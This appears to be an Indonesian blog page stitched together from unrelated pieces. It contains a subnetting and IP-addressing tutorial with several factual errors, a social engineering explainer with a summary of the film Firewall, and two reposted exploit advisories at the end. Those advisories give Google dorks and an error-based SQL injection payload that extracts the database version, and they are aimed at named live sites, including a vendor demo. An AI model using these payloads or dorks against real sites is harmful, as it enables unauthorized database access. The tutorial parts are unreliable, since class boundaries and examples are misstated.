Keterangan, maka subnet 64.0 atau 172.16.64.0, mempunyai host pertama 64.1 atau 172.16.64.1 sampai dengan 171.16.127.254 dan alamat broadcastnya 172.16.127.255
Contoh latihan subnetting : alamat class A
Alamat Network 10.0.0.0 dan subnet mask 255.255.0.0
Subnet 255 = 11111111, 2 8 – 2 = 254
Host 2 16 – 2 = 65.534
Subnet yang valid 256 – 255 = 1, 2 , 3 dan seterusnya. (semua di octet kedua). Subnetnya menjadi 10.1.0.0, 10.2.0.0, 10.3.0.0 dan seterusnya sampai 10.254.0.0
Subnet 10.1.0.0 … 10.254.0.0
Host pertama 10.1.0.1 … 10.254.0.1
Host terakhir 10.1.255.254 … 10.254.255.254
Broadcast 10.1.255.255 … 10.254.255.255

NETMASK/SUBNETMASK

Untuk pengelompokan pengalamatan, selain nomor IP dikenal juga netmask atau subnetmask. Yang besarnya sama dengan nomor IP yaitu 32 bit. Ada tiga pengelompokan besar subnet mask yaitu dengan dikenal, yaitu 255.0.0.0 , 255.255.0.0 dan 255.0.0.0.
Pada dunia jaringan, subnetmask tersebut dikelompokkan yang disebut class dikenal tiga class yaitu :
1. Class A, adalah semua nomor IP yang mempunyai subnetmask 255.0.0.0
2. Class B, adalah semua nomor IP yang mempunyai subnetmask 255.255.0.0
3. Class C, adalah semua nomor IP yang mempunyai subnetmask 255.255.255.0
Gabungan antara IP dan Netmask inilah pengalamatan komputer dipakai. Kedua hal ini tidak bisa lepas. Jadi penulisan biasanya sbb :
IP : 202.95.151.129
Netmask : 255.255.255.0
Suatu nomor IP kita dengan nomor IP tetangga dianggap satu kelompok (satu jaringan) bila IP dan Netmask kita dikonversi jadi biner dan diANDkan, begitu juga nomor IP tetangga dan Netmask dikonversi jadi biner dan diANDkan, jika kedua hasilnya sama maka satu jaringan. Dan kita bisa berhubungan secara langsung.
Ketika kita berhubungan dengan komputer lain pada suatu jaringan, selain IP yang dibutuhkan adalah netmask. Misal kita pada IP 10.252.102.12 ingin berkirim data pada 10.252.102.135 bagaimana komputer kita memutuskan apakah ia berada pada satu jaringan atau lain jaringan? Maka yang dilakukan adalah mengecek dulu netmask komputer kita karena kombinasi IP dan netmask menentukan range jaringan kita.
Jika netmask kita 255.255.255.0 maka range terdiri dari atas semua IP yang memiliki 3 byte pertama yang sama. Misal jika IP saya 10.252.102.12 dan netmask saya 255.255.255.0 maka range jaringan saya adalah 10.252.102.0-10.252.102.255 sehingga kita bisa secara langsung berkomunukasi pada mesin yang diantara itu, jadi 10.252.102.135 berada pada jaringan yang sama yaitu 10.252.102 (lihat yang angka-angka tercetak tebal menunjukkan dalam satu jaringan karena semua sama).
Dalam suatu organisasi komersial biasanya terdiri dari beberapa bagian, misalnya bagian personalia/HRD, Marketing, Produksi, Keuangan, IT dsb. Setiap bagian di perusahaan tentunya mempunyai kepentingan yang berbeda-beda. Dengan beberapa alasan maka setiap bagian bisa dibuatkan jaringan lokal sendiri – sendiri dan antar bagian bisa pula digabungkan jaringannya dengan bagian yang lain.
Ada beberapa alasan yang menyebabkan satu organisasi membutuhkan lebih dari satu jaringan lokal (LAN) agar dapat mencakup seluruh organisasi :
 Teknologi yang berbeda. Dalam suatu organisasi dimungkinkan menggunakan bermacam teknologi dalam jaringannya. Semisal teknologi ethernet akan mempunyai LAN yang berbeda dengan teknologi FDDI.
 Sebuah jaringan mungkin dibagi menjadi jaringan yang lebih kecil karena masalah performanasi. Sebuah LAN dengan 254 host akan memiliki performansi yang kurang baik dibandingkan dengan LAN yang hanya mempunyai 62 host. Semakin banyak host yang terhubung dalam satu media akan menurunkan performasi dari jaringan. Pemecahan yang paling sedherhana adalah memecah menjadi 2 LAN.
 Departemen tertentu membutuhkan keamanan khusus sehingga solusinya memecah menjadi jaringan sendiri.
Pembagian jaringan besar ke dalam jaringan yang kecil-kecil inilah yang disebut sebagai subnetting. Pemecehan menggunakan konsep subnetting. Membagi jaringan besar tunggal ke dalam sunet-subnet (sub-sub jaringan). Setiap subnet ditentukan dengan menggunakan subnet mask bersama-sama dengan no IP.
Pada subnetmask dalam biner, seluruh bit yang berhubungan dengan netID diset 1, sedangkan bit yang berhubungan dengan hostID diset 0.
Dalam subnetting, proses yang dilakukan ialah memakai sebagian bit hostID untuk membentuk subnetID. Dengan demikian jumlah bit yang digunakan untuk HostID menjadi lebih sedikit. Semakin panjang subnetID, jumlah subnet yang dibentuk semkain banyak, namun jumlah host dalam tiap subnet menjadi semakin sedikit.
Cara Pembentukan Subnet :
Misal jika jaringan kita adalah 192.168.0.0 dalm kelas B (kelas B memberikan range 192.168.0.0 – 192.168.255.255). Ingat kelas B berarti 16 bit pertama menjadi NetID yang dalam satu jaringan tidak berubah (dalam hal ini adalah 192.168) dan bit selanjutya sebagai Host ID (yang merupakan nomor komputer yang terhubung ke dan setiap komputer mempunyai no unik mulai dari 0.0 – 255.255). Jadi netmasknya/subnetmasknya adalah 255.255.0.0
Kita dapat membagi alokasi jaringan diatas menjadi jaringan yang kebih kecil dengan cara mengubha subnet yang ada.
Ada dua pendekatan dalam melakukan pembentukan subnet yaitu :
1. Berdasarkan jumlah jaringan yang akan dibentuk
2. Berdasarkan jumlah host yang dibentuk dalam jaringan.
Cara perhitungan subnet berdasarkan jumlah jaringan yang dibutuhkan :
1. Menentukan jumlah jaringan yang dibutuhkan dan merubahnya menjadi biner.
Misalkan kita ingin membuat 255 jaringan kecil dari nomor jaringan yang sudah ditentukan. 255  11111111
2. Menghitung jumlah bit dari nomor 1. Dan jumlah bit inilah yang disebut sebagai subnetID
Dari 255  11111111  jumlah bitnya adalah 8
3. Jumlah bit hostID baru adalah HosiID lama dikurangi jumlah bit nomor 2.
Misal dari contoh diatas hostIDbaru: 16 bit – 8 bit = 8 bit.
4. Isi subnetID dengan 1 dan jumlahkan dengan NetIDLama.
Jadi NetID baru kita adalah NetIDlama + SubNetID :
 11111111.11111111.11111111.00000000 (24 bit bernilai 1 biasa ditulis /24)
Berkat perhitungan di atas maka kita mempunyai 256 jaringan baru yaitu :
192.168.0.xxx, 192.168.1.xxx, 192.168.2.xxx, 192.168.3.xxx hingga 192.168.255.xxx dengan netmash 255.255.255.0.
xxx  menunjukkan hostID antara 0-255
Biasa ditulis dengan 192.168.0/24  192.168.0 menunjukkan NetID dan 24 menunjukkan subnetmask (jumlah bit yang bernilai 1 di subnetmask).
Dengan teknik ini kita bisa mengalokasikan IP address kelas B menjadi sekian banyak jaringan yang berukuran sama.
Cara perhitungan subnet berdasarkan jumlah host adalah sebagai berikut :
1. Ubah IP dan netmask menjadi biner
IP : 192.168.1.0  11000000.10101000.00000000.00000000
Netmask : 255.255.255.0  11111111.11111111. 11111111.00000000
Panjang hostID kita adalah yang netmasknya semua 0  16 bit.
2. Memilih jumlah host terbanyak dalam suatu jaringan dan rubah menjadi biner.
Misal dalam jaringan kita membutuhkan host 25 maka menjadi 11001.
3. Hitung jumlah bit yang dibutuhkan angka biner pada nomor 1. Dan angka inilah nanti sebagai jumlah host dalam jaringan kita.
Jumlah host 25 menjadi biner 11001 dan jumlah bitnya adalah 5.
4. Rubah netmask jaringan kita dengan cara menyisakan angka 0 sebanyak jumlah perhitungan nomor 3.
Jadi netmasknya baru adalah 11111111.11111111.11111111.11100000
Identik dengan 255.255.255.224 jika didesimalkan.
Jadi netmask jaringan berubah dan yang awalnya hanya satu jaringan dengan range IP dari 1 -254 menjadi 8 jaringan, dengan setiap jaringan ada 30 host/komputer
Alokasi Range IP
1 192.168.1.0 – 192.168.1.31
2 192.168.1.32 – 192.168.1.63
3 192.168.1.64 – 192.168.1.95
4 192.168.1.96 – 192.168.1.127
5 192.168.1.128 – 192.168.1.159
6 192.168.1.160 – 192.168.1.191
7 192.168.1.192 – 192.168.1.223
8 192.168.1.224 – 192.168.1.255
Nomor IP awal dan akhir setiap subnet tidak bisa dipakai. Awal dipakai ID Jaringan (NetID) dan akhir sebagai broadcast.
Misal jaringan A 192.168.1.0 sebagai NetID dan 192.168.1.31 sebagai broadcast dan range IP yang bisa dipakai 192.168.1.1-192.168.1.30.

IP ADDRESS

Agar unik setiap computer yang terkoneksi ke Internet diberi alamat yang berbeda. Alamat ini supaya seragam seluruh dunia maka pemberian alamat IP address diseluruh dunia diberikan oleh badan internasional Internet Assigned Number Authority (IANA), dimana IANA hanya memberikan IP address Network ID nya saja sedangkan host ID diatur oleh pemilik IP address tersebut.
Contoh IP address untuk cisco.com adalah 202.93.35.9 untuk www.ilkom.unsri.ac.id dengan IP nya 202.39.35.9
Alamat yang unik terdiri dari 32 bit yang dibagi dalam 4 oktet (8 bit)
00000000 . 00000000 . 00000000 . 00000000
o 1 o 2 o 3 o 4
Ip address dibagi menjadi 2 bagian yaitu Network ID dan Host ID,
Network ID yang akan menentukan alamat dalam jaringan (network address), sedangkan Host ID menentukan alamat dari peralatan jaringan yang sifatnya unik untuk membedakan antara satu mesin dengan mesin lainnya.
Ibaratkan Network ID Nomor jalan dan alamat jalan sedangkan Host ID adalah nomor rumahnya
IP address dibagi menjadi kelas yaitu ;
Kelas yang umum digunakan adalah kelas A sampai dengan kelas C.
Pada setiap kelas angka pertama dengan angka terakhir tidak dianjurkan untuk digunakan karena sebagai valid host id, misalnya kelas A 0 dan 127, kelas B 128 dan 192, kelas C 191 dan 224. ini biasanya digunakan untuk loopback addresss.
Catatan :
• alamat Network ID dan Host ID tidak boleh semuanya 0 atau 1 karena jika semuanya angka biner 1 : 255.255.255.255 maka alamat tersebut disebut floaded broadcast
• alamat network, digunakan dalam routing untuk menunjukkan pengiriman paket remote network, contohnya 10.0.0.0, 172.16.0.0 dan 192.168.10.0
Dari gambar dibawah ini perhatikan kelas A menyediakan jumlah network yang paling sediikit namun menyediakan host id yang paling banyak dikarenakan hanya oktat pertama yang digunakan untuk alamat network bandingkan dengan kelas B dan C.
Untuk mempermudah dalam menentukan kelas mana IP yang kita lihat, perhatikan gambar dibawah ini. Pada saat kita menganalisa suatu alamat IP maka perhatikan octet 8 bit pertamanya.
Pada kelas A : 8 oktet pertama adalah alamat networknya, sedangkan sisanya 24 bits merupakan alamat untuk host yang bisa digunakan.
Jadi admin dapat membuat banyak sekali alamat untuk hostnya, dengan memperhatikan
2 24 – 2 = 16.777.214 host
N ; jumlah bit terakhir dari kelas A
(2) adalah alamat loopback
Pada kelas B : menggunakan 16 bit pertama untuk mengidentifikasikan network sebagai bagian dari address. Dua octet sisanya (16 bits) digunakan untuk alamat host
2 16 – 2 = 65.534
Pada kelas C : menggunakan 24 bit pertama untuk network dan 8 bits sisanya untuk alamat host.
2 8 – 2 = 254
Nomor IP terdiri dari 32 bit yang didalamnya terdapat bit untuk NETWORK ID (NetID) dan HOST ID (HostID). Secara garis besar berikut inilah pembagian kelas IP secara default

GATEWAY/ROUTER

Gateway adalah komputer yang memiliki minimal 2 buah network interface untuk menghubungkan 2 buah jaringan atau lebih. Di Internet suatu alamat bisa ditempuh lewat gateway-gateway yang memberikan jalan/rute ke arah mana yang harus dilalui supaya paket data sampai ke tujuan. Kebanyakan gateway menjalankan routing daemon (program yang meng-update secara dinamis tabel routing). Karena itu gateway juga biasanya berfungsi sebagai router. Gateway/router bisa berbentuk Router box seperti yang di produksi Cisco, 3COM, dll atau bisa juga berupa komputer yang menjalankan Network Operating System plus routing daemon. Misalkan PC yang dipasang Unix FreeBSD dan menjalankan program Routed atau Gated. Namun dalam pemakaian Natd, routing daemon tidak perlu dijalankan, jadi cukup dipasang gateway saja.
Karena gateway/router mengatur lalu lintas paket data antar jaringan, maka di dalamnya bisa dipasangi mekanisme pembatasan atau pengamanan (filtering) paket-paket data. Mekanisme ini disebut Firewall.
Sebenarnya Firewall adalah suatu program yang dijalankan di gateway/router yang bertugas memeriksa setiap paket data yang lewat kemudian membandingkannya dengan rule yang diterapkan dan akhirnya memutuskan apakah paket data tersebut boleh diteruskan atau ditolak. Tujuan dasarnya adalah sebagai security yang melindungi jaringan internal dari ancaman dari luar. Namun dalam tulisan ini Firewall digunakan sebagai basis untuk menjalankan Network Address Translation (NAT).
Dalam FreeBSD, program yang dijalankan sebagai Firewall adalah ipfw. Sebelum dapat menjalankan ipfw, kernel GENERIC harus dimodifikasi supaya mendukung fungsi firewall. Ipfw mengatur lalu lintas paket data berdasarkan IP asal, IP tujuan, nomor port, dan jenis protocol. Untuk menjalankan NAT, option IPDIVERT harus diaktifkan dalam kernel.
DIVERT (mekanisme diversi paket kernel)
Socket divert sebenarnya sama saja dengan socket IP biasa, kecuali bahwa socket divert bisa di bind ke port divert khusus lewat bind system call. IP address dalam bind tidak diperhatikan, hanya nomor port-nya yang diperhatikan. Sebuah socket divert yang dibind ke port divert akan menerima semua paket yang didiversikan pada port tersebut oleh mekanisme di kernel yang dijalankan oleh implementasi filtering dan program ipfw. Mekanisme ini yang dimanfaatkan nantinya oleh Network Address Translator.
Itulah beberapa bahasan awal yang akan mengantar kita ke pembahasan inti selanjutnya.

BROADCAST

Alamat ini digunakan untuk mengirim/menerima informasi yang harus diketahui oleh seluruh host yang ada pada suatu jaringan. Seperti diketahui, setiap paket IP memiliki header alamat tujuan berupa IP Address dari host yang akan dituju oleh paket tersebut. Dengan adanya alamat ini, maka hanya host tujuan saja yang memproses paket tersebut, sedangkan host lain akan mengabaikannya. Bagaimana jika suatu host ingin mengirim paket kepada seluruh host yang ada pada jaringannya? Tidak efisien jika ia harus membuat replikasi paket sebanyak jumlah host tujuan. Pemakaian bandwidth/jalur akan meningkat dan beban kerja host pengirim bertambah, padahal isi paket-paket tersebut sama. Oleh karena itu, dibuat konsep broadcast address. Host cukup mengirim ke alamat broadcast, maka seluruh host yang ada pada network akan menerima paket tersebut. Konsekuensinya, seluruh host pada jaringan yang sama harus memiliki broadcast address yang sama dan alamat tersebut tidak boleh digunakan sebagai nomor IP untuk host tertentu.
Jadi, sebenarnya setiap host memiliki 2 alamat untuk menerima paket : pertama adalah nomor IP yang bersifat unik dan kedua adalah broadcast address pada jaringan tempat host tersebut berada. Broadcast address diperoleh dengan membuat seluruh bit host pada nomor IP menjadi 1. Jadi, untuk host dengan IP address 167.205.9.35 atau 167.205.240.2, broadcast addressnya adalah 167.205.255.255 (2 segmen terakhir dari IP Address tersebut dibuat berharga 11111111.11111111, sehingga secara desimal terbaca 255.255). Jenis informasi yang dibroadcast biasanya adalah informasi routing.

Pengertian Social Engineering Inveet.id rwxr-xr-x 1 01.53

Filename Pengertian Social Engineering
Permission rw-r--r--
Author Inveet.id
Date and Time 01.53
Label
Action
Pengertian Social Engineering

Secara mendasar, social engineering adalah seni dan ilmu memaksa orang untuk mematuhi harapan-harapan anda. Ia bukanlah suatu cara untuk mengendalikan pikiran orang lain, ia tidak akan mengijinkan anda untuk memaksa orang lain menunjukkan tugas-tugas secara liar di luar tingkah laku normal mereka dan ini jauh dari hal-hal bodoh semacam itu. Ia (social engineering) juga melibatkan lebih dari sekedar berpikir cepat dan sederhana dari suatu aksen yang menyenangkan. Social engineering bisa melibatkan banyak "kerja-kerja yang membumi", pengumpulan informasi dan idle chi chat sebelum adanya usaha untuk mendapatkan informasi yang pernah dibuat. Seperti hacking sebagian besar kerjanya masih dalam batas interpretasi, lebih dari sekedar usaha itu sendiri.
Social engineering berkosentrasi pada link paling lemah dari alur keamanan komputer. Seringkali dikatakan bahwa hanya komputer yang paling aman adalah komputer yang unplugged. Fakta bahwa anda dapat meyakinkan seseorang untuk masuk ke dalamnya dan menghidupkannya berarti bahwa komputer yang kekuatannya menurunpun sangat rentan.


Social engineering (keamanan)
Dari Wikipedia Indonesia, ensiklopedia bebas berbahasa Indonesia.

Social engineering adalah pemerolehan informasi atau maklumat rahasia/sensitif dengan cara menipu pemilik informasi tersebut. Social engineering umumnya dilakukan melalui telepon atau Internet. Social engineering merupakan salah satu metode yang digunakan oleh hacker untuk memperoleh informasi tentang targetnya, dengan cara meminta informasi itu langsung kepada korban atau pihak lain yang mempunyai informasi itu.
Social engineering mengkonsentrasikan diri pada rantai terlemah sistem jaringan komputer, yaitu manusia. Seperti kita tahu, tidak ada sistem komputer yang tidak melibatkan interaksi manusia. Dan parahnya lagi, celah keamanan ini bersifat universal, tidak tergantung platform, sistem operasi, protokol, software ataupun hardware. Artinya, setiap sistem mempunyai kelemahan yang sama pada faktor manusia. Setiap orang yang mempunyai akses kedalam sistem secara fisik adalah ancaman, bahkan jika orang tersebut tidak termasuk dalam kebijakan kemanan yang telah disusun. Seperti metoda hacking yang lain, social engineering juga memerlukan persiapan, bahkan sebagian besar pekerjaan meliputi persiapan itu sendiri.
Faktor utama

Di balik semua sistem keaman dan prosedur-prosedur pengamanan yang ada masih terdapat faktor lain yang sangat penting, yaitu : manusia.
Pada banyak referensi, faktor manusia dinilai sebagai rantai paling lemah dalam sebuah sistem keamanan. Sebuah sistem keamanan yang baik, akan menjadi tidak berguna jika ditangani oleh administrator yang kurang kompeten. Selain itu, biasanya pada sebuah jaingan yang cukup kompleks terdapat banyak user yang kurang mengerti masalah keamanan atau tidak cukup peduli tentang hal itu. Ambil contoh di sebuah perusahaan, seorang network admin sudah menerapkan kebijakan keamanan dengan baik, namun ada user yang mengabaikan masalah kemanan itu. Misalnya user tersebut menggunakan password yang mudah ditebak, lupa logout ketika pulang kerja, atau dengan mudahnya memberikan akses kepada rekan kerjanya yang lain atau bahkan kepada kliennya. Hal ini dapat menyebabkan seorang penyerang memanfaatkan celah tersebut dan mencuri atau merusak datadata penting perusahaan.
Atau pada kasus di atas, seorang penyerang bisa berpura-pura sebagai pihak yang berkepentingan dan meminta akses kepada salah satu user yang ceroboh tersebut. Tindakan ini digolongkan dalam Social Engineering.
Contoh-contoh social engineering dari film Firewall
Dari film Firewall dikisahkan Jack Stanfield bekerja sebagai Computer Security Specialist di Seattle-based Landrock Pacific Bank. Karirnya yang tergolong cemerlang membuatnya menjadi salah satu orang penting di kantornya. Kehidupan keluarga bersama istri dan dua anaknya juga berjalan lancar-lancar saja hingga suatu hari terjadi hal yang tidak diduga.
Setelah seharian sumpek dengan rapat kantor soal rencana merger dengan bank lain, Jack dikejutkan oleh seseorang bernama Bill Cox (Paul Bettany) yang mengklaim telah berhasil menyekap istri dan anak-anak Jack di rumah mereka sendiri. Padahal baru saja Jack mengenal Bill sebagai seorang calon investor. Tanpa disadari oleh Jack, ternyata aktivitasnya dan keluarganya telah diawasi dan disadap berbulan-bulan sebelumnya oleh komplotan Bill.
Bisa ditebak, ini adalah cerita penyanderaan bermotif uang. Ya, target mereka adalah uang sejumlah $100 juta. Lucunya, walaupun Bill sesumbar kalo komplotannya berhasil menyusup ke server kantornya Jack dan menginstal program jahat di dalamnya namun mereka tetap saja masih butuh bantuan Jack untuk mensortir 10.000 rekening nasabah dengan saldo terbesar yang akan menjadi sasaran pembobolan. Bill juga ikut panik saat tahu kalo server yang berisi data-data itu barusan pindah ke kantor lain. Hei, kenapa penjahat itu tiba-tiba terlihat jadi tidak secerdas awalnya yang dilihatkan cukup profesional? Apa bedanya dengan pembobolan pakai cara tradisional? Coba bandingkan dengan pembobolan bank via komputer dalam film Swordfish yang tidak perlu memaksa orang dalam terlibat dan tidak perlu bingung soal lokasi server. Cukup dilakukan oleh seorang yang jago menembus celah-celah keamanan server.
Kembali ke alur cerita Firewall. Berada di bawah ancaman dan tekanan, apalagi usaha keluarganya untuk meloloskan diri gagal, membuat Jack harus berpikir keras. Taka disangka, Jack mendapat ide memanfaatkan salah satu bagian dari mesin fax dan iPod milik anaknya untuk melaksanakan rencana itu. Gabungan kedua alat itu ternyata membuahkan hasil. Usai beraksi, agar tidak meninggalkan jejak, disebarkanlah virus dalam jaringan komputer di kantornya yang menggunakan Win XP!
Apakah film ini berakhir begitu saja? Apakah cukup sampai berhasil tidaknya usaha pembobolan bank itu? Untunglah tidak demikian. Masih ada aksi seru Jack dalam menyelamatkan keluarganya, membereskan usaha fitnah terhadap dirinya, sekaligus menekan gerombolan penjahat itu dengan menggunakan berbagai cara, termasuk memanfaatkan GPS untuk mengetahui lokasi persembunyian mereka.

pages.php?action=menu&id=[sqli] SQL Injection Vulnerability Inveet.id rwxr-xr-x 0 23.53

Filename pages.php?action=menu&id=[sqli] SQL Injection Vulnerability
Permission rw-r--r--
Author Inveet.id
Date and Time 23.53
Label
Action
########################################
# pages.php?action=menu&id= SQL Injection Vulnerability
#
#author : qibo212
#date : 01 april 2011
#bug : sql injection
#dork : inurl:pages.php?action=menu
########################################

example:

http://site.com/path/pages.php?action=menu[sql injection]

demo site :

http://www.bviinvestmentclub.com/pages.php?action=menu&id=40'

PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability Inveet.id rwxr-xr-x 0 21.17

Filename PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability
Permission rw-r--r--
Author Inveet.id
Date and Time 21.17
Label
Action
###################################################################################
## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ##
## Author : kaMtiEz (kamtiez@exploit-id.com) ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ##
## Date : 3 July, 2011 ##
###################################################################################

[ Software Information ]

[+] Vendor : http://www.phpfood.com/
[+] Download : http://www.phpfood.com/download.html
[+] version : 2.00 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

####################################################################################

[ Vulnerable File ]


http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 

 
[ DEMO ]

  
http://www.phpfood.com/demo/restaurant.php?id=4 and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

 
[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D


Sumber : http://blog.defacerz.com/2011/07/phpfood-cms-restaurant.html
 

Jayalah Indonesiaku © 2010 Mydisha Note